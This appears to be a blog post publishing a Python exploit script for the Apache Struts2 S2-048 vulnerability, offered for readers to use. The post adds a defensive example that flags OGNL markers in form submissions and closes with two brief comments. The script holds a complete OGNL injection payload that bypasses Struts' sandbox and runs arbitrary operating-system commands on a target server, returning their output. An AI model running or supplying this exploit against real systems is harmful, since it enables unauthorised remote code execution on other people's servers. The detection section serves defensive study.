
struts2 S2-048 remote code execution vulnerability exp


The Struts2 S2-048 vulnerability that broke out this time does not have a very large impact, and others online have already shared an exp; here I add one that I modified myself. Feel free to take it and play with it.

[image: struts2]

struts2 s2-048 exp code:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2017/7/10
# Created by 独自等待
# Blog: https://www.waitalone.cn/
# Version : V1.0
import urllib2
import sys, os


def s2048(url, cmd):
    payload = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    data = "__checkbox_bustedBefore=true&age=111&description=111&name=%s" % urllib2.quote(payload, safe="()")
    try:
        req = urllib2.Request(url, data=data)
        res = urllib2.urlopen(req, timeout=10).read()
    except Exception, e:
        raise e
    else:
        print res


if __name__ == '__main__':
    print '+' + '-' * 50 + '+'
    print u'\t  Python Struts2 S2-048 检测工具'
    print u'\t   Blog:https://www.waitalone.cn/'
    print u'\t\t Code BY: 独自等待'
    print u'\t\t Time:2017-07-10'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 3:
        print u'用法: ' + os.path.basename(sys.argv[0]) + u'   待检测的URL地址    待执行的命令'
        print u'实例: ' + os.path.basename(sys.argv[0]) + u' https://www.waitalone.cn/ "net user"'
        sys.exit()
    url = sys.argv[1]
    cmd = sys.argv[2]
    s2048(url, cmd)

Usage: struts2-048.py <URL to check> <command to execute>
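From the defender's side, the request the script above sends has a very recognisable shape: an ordinary showcase form submission (`__checkbox_bustedBefore`, `age`, `description`, `name`) whose `name` field carries an OGNL expression. The following is an added example, not code from the original post, showing how a WAF rule or log-review script can flag such a body: it decodes the form parameters (including a second layer of URL encoding) and looks for the OGNL markers that appear in the payload on this page. Both request bodies are constructed for the example; the function names are my own.

```python
#!/usr/bin/env python3
"""Flag form submissions whose parameters carry OGNL expression markers.

Added example for the S2-048 request shape shown above; not part of the
original post. Sample request bodies below are constructed.
"""
from urllib.parse import parse_qs, quote, unquote_plus

# Substrings taken from the payload shown on this page. None of them has any
# business appearing in a legitimate showcase form value.
OGNL_MARKERS = (
    "%{",                                          # OGNL expression opener
    "#_memberAccess",                              # sandbox bypass variable
    "ognl.OgnlContext",
    "DEFAULT_MEMBER_ACCESS",
    "getExcludedPackageNames",                     # clears the class blacklist
    "java.lang.ProcessBuilder",                    # process spawn
    "@org.apache.struts2.ServletActionContext@",   # response hijack for output
)


def decode_param(value, rounds=2):
    """Undo up to `rounds` extra layers of URL encoding so that a
    double-encoded payload is inspected in plain form as well."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_form_body(body):
    """Return {param_name: [markers found]} for an
    application/x-www-form-urlencoded request body.

    parse_qs already performs one round of percent-decoding; decode_param
    handles additional layers."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            text = decode_param(raw)
            found = [marker for marker in OGNL_MARKERS if marker in text]
            if found:
                hits.setdefault(name, []).extend(found)
    return hits


def is_ognl_injection(body):
    """True when any parameter in the body carries an OGNL marker."""
    return bool(scan_form_body(body))


# Constructed benign submission to the showcase form the page targets.
BENIGN_BODY = "__checkbox_bustedBefore=true&age=30&description=hello&name=alice"

# Constructed malicious submission: a truncated head of the page's payload,
# encoded the way the script above encodes it (everything but parentheses).
_PAYLOAD_HEAD = (
    "%{(#_='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess=#dm)...truncated...(#p=new java.lang.ProcessBuilder(#cmds))...}"
)
MALICIOUS_BODY = (
    "__checkbox_bustedBefore=true&age=111&description=111&name="
    + quote(_PAYLOAD_HEAD, safe="()")
)


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, "->", scan_form_body(body) or "clean")
```

The marker list is deliberately broad: matching on `%{` alone would also catch variants that rename the helper variables, while the more specific strings give an analyst a quick read on which stage of the chain (sandbox bypass, blacklist clearing, process spawn, output hijack) the request was attempting. Because the check runs on decoded values, the same function can be applied to bodies recovered from a proxy or access log that were captured in encoded form.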

[image: struts2-exp]

There are currently 2 visitor comments

  1. nhks2055
    2017-10-12 19:52

    Learned about this vulnerability.

  2. 脚踏实地
    2017-10-16 13:43

    The impact is not that big; not much use.
